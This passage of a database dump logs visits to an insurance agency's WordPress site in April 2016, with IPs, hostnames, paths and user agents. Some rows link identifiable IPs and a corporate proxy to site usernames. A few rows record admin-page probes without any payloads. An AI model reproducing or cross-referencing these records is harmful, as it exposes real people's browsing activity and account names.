+http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15741,'0b_31d5cbb3f177ca9ae0c5d33d77063b03','1460352119','45.79.81.142','li1180-142.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(15744,'0b_b2f2e3fe295b3004595784f2a619ea5f','1460357973','207.46.13.64','msnbot-207-46-13-64.search.msn.com','/left.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15747,'0b_104b19365891ec37a821b3d81150432d','1460361912','54.187.99.224','ec2-54-187-99-224.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','Unknown Spider','','','','0','0',0),(15749,'0b_104b19365891ec37a821b3d81150432d','1460361914','54.187.99.224','ec2-54-187-99-224.us-west-2.compute.amazonaws.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','Unknown Spider','','','','0','0',0),(15751,'0b_104b19365891ec37a821b3d81150432d','1460361914','54.187.99.224','ec2-54-187-99-224.us-west-2.compute.amazonaws.com','/term-quotes/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','Unknown Spider','','','','0','0',0),(15753,'0b_104b19365891ec37a821b3d81150432d','1460361917','54.187.99.224','ec2-54-187-99-224.us-west-2.compute.amazonaws.com','/igo/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','Unknown Spider','','','','0','0',0),(15755,'0b_104b19365891ec37a821b3d81150432d','1460361917','54.187.99.224','ec2-54-187-99-224.us-west-2.compute.amazonaws.com','/forms/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','Unknown Spider','','','','0','0',0),(15757,'0b_104b19365891ec37a821b3d81150432d','1460361918','54.187.99.224','ec2-54-187-99-224.us-west-2.compute.amazonaws.com','/carriers/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','Unknown Spider','','','','0','0',0),(15759,'0b_104b19365891ec37a821b3d81150432d','1460361918','54.187.99.224','ec2-54-187-99-224.us-west-2.compute.amazonaws.com','/register/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','Unknown Spider','','','','0','0',0),(15761,'0b_104b19365891ec37a821b3d81150432d','1460361919','54.187.99.224','ec2-54-187-99-224.us-west-2.compute.amazonaws.com','/insentives/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','Unknown Spider','','','','0','0',0),(15763,'0b_104b19365891ec37a821b3d81150432d','1460361919','54.187.99.224','ec2-54-187-99-224.us-west-2.compute.amazonaws.com','/agent-tools/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','Unknown Spider','','','','0','0',0),(15765,'0b_104b19365891ec37a821b3d81150432d','1460361920','54.187.99.224','ec2-54-187-99-224.us-west-2.compute.amazonaws.com','/case-status/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','Unknown Spider','','','','0','0',0),(15767,'0b_104b19365891ec37a821b3d81150432d','1460361920','54.187.99.224','ec2-54-187-99-224.us-west-2.compute.amazonaws.com','/licensing-contracting/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','Unknown Spider','','','','0','0',0),(15769,'0b_104b19365891ec37a821b3d81150432d','1460361920','54.187.99.224','ec2-54-187-99-224.us-west-2.compute.amazonaws.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','Unknown Spider','','','','0','0',0),(15771,'0b_104b19365891ec37a821b3d81150432d','1460361921','54.187.99.224','ec2-54-187-99-224.us-west-2.compute.amazonaws.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'MacOSX','Firefox 39','','','','Unknown Spider','','','','0','0',0),(15773,'0b_20f677c508eef6e5cc0706756677b9ab','1460362795','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15774,'0b_6d1e01383a960b3cad60d680085249fd','1460364912','204.13.48.52','204.13.48.52','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'WinVista','Firefox 15','ua','','','','','','','0','0',0),(15775,'0b_67d8835952d882857c5ad560d4d58ca7','1460367275','72.11.150.194','72.11.150.194.static.quadranet.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'WinXP','Firefox 16','ua','','','','','','','0','0',0),(15776,'0b_514ba230cfe294ece34ef6dd0b972932','1460368286','178.32.127.112','WIN-96VQ81BM844','/wp-admin/theme-install.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','','','','','','','','3','0',0),(15778,'0b_514ba230cfe294ece34ef6dd0b972932','1460368293','178.32.127.112','WIN-96VQ81BM844','/wp-admin/theme-install.php?tab=upload','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','','','','','','','','3','0',0),(15780,'0b_88b567d857bd103113d4f978597245dc','1460371051','78.188.171.84','78.188.171.84.dynamic.ttnet.com.tr','/','Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','tr','','','','','','','0','0',0),(15783,'0b_a2a9307f19729825fc04b0587d9dac89','1460373798','31.3.233.115','h31-3-233-115.host.redstation.co.uk','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','','',0,'Linux','Chrome 35','gb','','','','','','','0','0',0),(15785,'0b_a2a9307f19729825fc04b0587d9dac89','1460373810','31.3.233.115','h31-3-233-115.host.redstation.co.uk','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','http://www.empireins.com/','',0,'Linux','Chrome 35','gb','','','','','','','0','0',0),(15788,'0b_add122f333b8ac561db8f73b5f418d49','1460375272','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15789,'0b_029644e499cc2653561c4a27daa420f7','1460378319','180.76.15.5','baiduspider-180-76-15-5.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(15792,'0b_c44073e62568395c2e64672bee53a31e','1460379994','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(15795,'0b_c44073e62568395c2e64672bee53a31e','1460379994','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(15798,'0b_c44073e62568395c2e64672bee53a31e','1460379996','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(15801,'0b_d5fac75ab17f4c488386c8630c798a91','1460380041','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(15803,'0b_d5fac75ab17f4c488386c8630c798a91','1460380042','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(15806,'0b_c44073e62568395c2e64672bee53a31e','1460380908','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(15807,'0b_c44073e62568395c2e64672bee53a31e','1460380910','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(15810,'0b_c44073e62568395c2e64672bee53a31e','1460381289','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(15813,'0b_c44073e62568395c2e64672bee53a31e','1460381290','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(15815,'0b_34ce3d2879b3b517dad28f7121871280','1460381658','207.46.13.164','msnbot-207-46-13-164.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15818,'0b_95a1f945e171e00c4ff9885eb3c964a4','1460383132','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(15821,'0b_875134d476a4aa0f0c3ee131917276b6','1460386885','184.154.36.163','scan21.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15822,'0b_875134d476a4aa0f0c3ee131917276b6','1460386889','184.154.36.163','scan21.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15824,'0b_875134d476a4aa0f0c3ee131917276b6','1460386906','184.154.36.163','scan21.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(15827,'0b_c44073e62568395c2e64672bee53a31e','1460386974','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(15828,'0b_5aa4fe8d6f91d1f05f5120a9f3e58041','1460387637','206.210.27.33','proxy3.newyorklife.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1600 x 900','Google','','','','','0','0',0),(15831,'0b_082fbc1b966ed62675dae30080091617','1460387639','206.210.27.33','proxy3.newyorklife.com','/home/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(15833,'0b_082fbc1b966ed62675dae30080091617','1460387640','206.210.27.33','proxy3.newyorklife.com','/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(15836,'0b_082fbc1b966ed62675dae30080091617','1460387640','206.210.27.33','proxy3.newyorklife.com','/comments/feed/','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(15837,'0b_082fbc1b966ed62675dae30080091617','1460387641','206.210.27.33','proxy3.newyorklife.com','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible;)','','',0,'','Netscape 4','','','','','','','','0','0',0),(15839,'0b_5aa4fe8d6f91d1f05f5120a9f3e58041','1460387641','206.210.27.33','proxy3.newyorklife.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(15840,'0b_d878a077cc58a41d1da843070f8bb1c5','1460389097','185.75.241.162','185.75.241.162','/','Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.9.168 Version/11.52','','',0,'MacOSX','Opera 9','us','','','','','','','0','0',0),(15842,'0b_1f84ca747fbb2f3611031174dbe5d281','1460389107','71.7.181.145','blk-7-181-145.eastlink.ca','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36','','',0,'WinXP','Chrome 41','ca','','','','','','','0','0',0),(15843,'0b_f3df168a9bb6d98fb5ce54ec5ebdf6d3','1460390299','173.220.69.210','ool-addc45d2.static.optonline.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win10','Chrome 49','us','','','','','','','0','0',0),(15845,'0b_b892b99a450caf40cfd3f540a048acf9','1460390299','173.220.69.210','ool-addc45d2.static.optonline.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win10','Chrome 49','us','1680 x 1050','','','','imayer','','0','0',0),(15848,'0b_b892b99a450caf40cfd3f540a048acf9','1460390302','173.220.69.210','ool-addc45d2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1680 x 1050','','','','imayer','','0','0',0),(15849,'0b_b892b99a450caf40cfd3f540a048acf9','1460390330','173.220.69.210','ool-addc45d2.static.optonline.net','/insentives/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1680 x 1050','','','','imayer','','0','0',0),(15851,'0b_b892b99a450caf40cfd3f540a048acf9','1460390333','173.220.69.210','ool-addc45d2.static.optonline.net','/about-us/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win10','Chrome 49','us','1680 x 1050','','','','imayer','','0','51',0),(15854,'0b_b892b99a450caf40cfd3f540a048acf9','1460390335','173.220.69.210','ool-addc45d2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win10','Chrome 49','us','1680 x 1050','','','','imayer','','0','51',0),(15855,'0b_b892b99a450caf40cfd3f540a048acf9','1460390365','173.220.69.210','ool-addc45d2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win10','Chrome 49','us','1680 x 1050','','','','imayer','','0','51',0),(15857,'0b_19121447c8daddbd52c2eee1455cd2a5','1460390908','178.18.252.103','178.18.252.103','/robots.txt','Mozilla/5.0 (Linux; U; Android 2.3; en-us) AppleWebKit/999+ (KHTML, like Gecko) Safari/999.9','','',0,'Android 2','Safari 999','us','','','Unknown Spider','','','','0','0',0),(15860,'0b_5bbf23395eba2a585fbfabf1d608f8b2','1460390918','89.144.33.243','89.144.33.243','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.1.76908; WOW64; en-US)','','',0,'WinVista x64','IE 9','us','','','','','','','0','0',0),(15863,'0b_57ee749a93fa331bdeb0b173e6dfde0a','1460391026','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(15866,'0b_6052ce1dfa8bfa88bdee9fd06727de20','1460391519','180.76.15.148','baiduspider-180-76-15-148.crawl.baidu.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(15869,'0b_bb086adbe36bfa1b21f187cfd9fe2fb0','1460391546','158.69.200.204','204.ip-158-69-200.net','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(15872,'0b_bb086adbe36bfa1b21f187cfd9fe2fb0','1460391548','158.69.200.204','204.ip-158-69-200.net','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(15875,'0b_8607bc2ab1fa05c791dd8e285e6d8da0','1460392933','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(15878,'0b_3d8d8f97e10735d452ee5ba95ef3ae68','1460393076','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','1600 x 900','','','','','','0','0',0),(15881,'0b_3d8d8f97e10735d452ee5ba95ef3ae68','1460393078','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','','','0','0',0),(15884,'0b_3d8d8f97e10735d452ee5ba95ef3ae68','1460393081','69.164.140.246','69.164.140.246.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','','','0','0',0),(15887,'0b_3d8d8f97e10735d452ee5ba95ef3ae68','1460393156','69.164.140.246','69.164.140.246.xchangetele.com','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(15888,'0b_3d8d8f97e10735d452ee5ba95ef3ae68','1460393239','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(15890,'0b_dd857d29d9777ad95eba6da59802a7b2','1460393286','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(15891,'0b_c4cc769cf04a0d9ab5ee7d1ad9cf20f1','1460393292','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(15894,'0b_c4cc769cf04a0d9ab5ee7d1ad9cf20f1','1460393293','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(15896,'0b_c4cc769cf04a0d9ab5ee7d1ad9cf20f1','1460393299','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(15897,'0b_c4cc769cf04a0d9ab5ee7d1ad9cf20f1','1460393373','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(15899,'0b_c4cc769cf04a0d9ab5ee7d1ad9cf20f1','1460393377','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(15900,'0b_9941ac4bec166c6faa51e697e649a427','1460393394','142.166.252.129','sydnns0114w-142166252129.pppoe-dynamic.high-speed.ns.bellaliant.net','/robots.txt','Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27','','',0,'Win7','Version 5','us','','','Unknown Spider','','','','0','0',0),(15903,'0b_e5dff172387de4a79d3831ba7b5f3bab','1460393394','185.75.241.132','185.75.241.132','/robots.txt','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)','','',0,'Win7 x64','IE 9','us','','','Unknown Spider','','','','0','0',0),(15906,'0b_be6d3a04295806202a1410cf5bbd609b','1460393394','217.18.244.170','217.18.244.170','/robots.txt','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)','','',0,'Win7','IE 9','us','','','Unknown Spider','','','','0','0',0),(15908,'0b_2fdccd17e70d9d47189d9e9464a0bc7a','1460393404','71.7.181.145','blk-7-181-145.eastlink.ca','/term-quotes/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F','','',0,'Linux','Google Chrome','ca','','','','','','','0','0',0),(15909,'0b_92bbf1c64ca508dbd5e3a523bc0843ea','1460393404','94.103.44.23','94.103.44.23','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)','','',0,'WinVista','IE 9','us','','','','','','','0','0',0),(15912,'0b_d90d701b90b86718ed229b58dc1efd7f','1460393405','217.18.247.126','217.18.247.126','/igo/','Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','','',0,'OpenBSD','Chrome 36','us','','','','','','','0','0',0),(15914,'0b_03899068aae6f903c3f5220522b4b996','1460393414','174.25.82.216','174-25-82-216.ptld.qwest.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko','','',0,'Win8','','us','','','','','','','0','0',0),(15915,'0b_c8a0b5b2d1b6cc32dc3cd23d8f6958e6','1460393417','185.75.243.174','185.75.243.174','/register/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36','','',0,'MacOSX','Chrome 36','us','','','','','','','0','0',0),(15917,'0b_9cee50ad6f7d40869aac3fb14427d327','1460393427','71.7.181.145','blk-7-181-145.eastlink.ca','/forms/','Opera/9.80 (Windows NT 6.0; U; en) Presto/2.8.99 Version/11.10','','',0,'WinVista','Opera 9','ca','','','','','','','0','0',0),(15920,'0b_b015170c97297d475c950aed73fd1ed9','1460393418','185.75.242.167','185.75.242.167','/feed/','Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0','','',0,'Win7','Firefox 21','us','','','','','','','0','0',0),(15921,'0b_56689b4a264f7f09193537dafe5d01fa','1460393428','71.7.181.145','blk-7-181-145.eastlink.ca','/about-us/','Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)','','',0,'WinXP','IE 9','ca','','','','','','','0','0',0),(15924,'0b_b7bc2f2d29b7d54f0f89a118aced7447','1460393430','174.127.99.50','pasaklibey.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36','','',0,'Win8','Chrome 41','us','','','','','','','0','0',0),(15927,'0b_fb4850eb052175272cbb52035a2f138c','1460393431','173.192.206.97','61.ce.c0ad.ip4.static.sl-reverse.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36','','',0,'WinXP','Chrome 31','us','','','','','','','0','0',0),(15929,'0b_90f1c2f9b0a5fec88e6885c36d166a76','1460393433','94.103.44.20','94.103.44.20','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0','','',0,'Win7 x64','Firefox 22','us','','','','','','','0','0',0),(15930,'0b_1fd9f222f28fef9a7be7b9fa2b41b665','1460393429','207.195.235.62','207.195.235.62','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(15933,'0b_70b63730cedfa06fd7febdd765cf5b1a','1460393445','185.35.21.205','185.35.21.205','/home/feed/','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27','','',0,'MacOSX','Safari 5','us','','','','','','','0','0',0),(15936,'0b_858c64bd6c01c29190687b2bdb29257f','1460393455','217.172.39.27','reverse.lightup.net','/insentives/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36','','',0,'MacOSX','Chrome 